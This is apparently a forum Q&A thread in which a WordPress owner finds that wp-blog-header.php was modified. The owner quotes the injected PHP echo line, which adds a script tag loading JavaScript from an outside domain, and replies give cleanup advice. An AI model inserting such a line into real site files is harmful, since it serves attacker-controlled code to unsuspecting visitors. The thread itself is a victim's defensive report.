# My wordpress site was hacked

Tags: wordpress

For some reason, my site was hacked.

I checked my FTP files and I noticed that `wp-blog-header.php` was modified recently.

This is my `wp-blog-header.php` before it was hacked:

```
<?php  
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( !isset($wp_did_header) ) {

    $wp_did_header = true;

    require_once( dirname(__FILE__) . '/wp-load.php' );

    wp();

    require_once( ABSPATH . WPINC . '/template-loader.php' );

}
```

This is my file after it has been hacked:

```
<?php echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>"; 
/**
 * Loads the WordPress environment and template.
...
```

So, they added this line to my file:

```
echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>";
```

When I remove this line, my site works fine, but in a few hours they add this line again. I checked my database lines but I couldn't find anything wrong.
It appears to me it's a new failure. I googled it yesterday and I couldn't find much, only some french websites that they didn't have any clear solution to this problem. So, have anyone experienced it before?

These are plugins that I'm using in this site and their respective versions:

```
WordPress v4.1.8
Advanced Custom Fields v4.0.0
```

Comment: Make sure wordpress is up to date. Change all your passwords. Verify no other user accounts have FTP access that you did not configure. If the issue persists, take it up with your hosting company.

Comment: Do you have backups? Are you hosting on a shared hosting site like Dreamhost? You were most likely backdoored, as suggested above - change passwords, wipe and re-install if possible and contact your hosting provider.

Comment: WordPress has a detailed FAQ on how to handle a hacked WordPress site. https://codex.wordpress.org/FAQ_My_site_was_hacked

Answer (score 0):

Use a plug-in Anti-Malware GOTMLS.NET https://wordpress.org/plugins/gotmls/ it has worked for us with exactly the same issue, so far so good, almost 24 hours and the script has not been seen.

Answer (score 0):

Just happened to me too. Fortunately I had just installed a security plugin and it alerted me to a login that I know was not-authorized, I'm investigating now and will update here again.

Comment: UPDATE, turns out it wasn't related to the login breach, my root directory has over 50 extra folders in it and it all happened about a week before I noticed the JS in the header.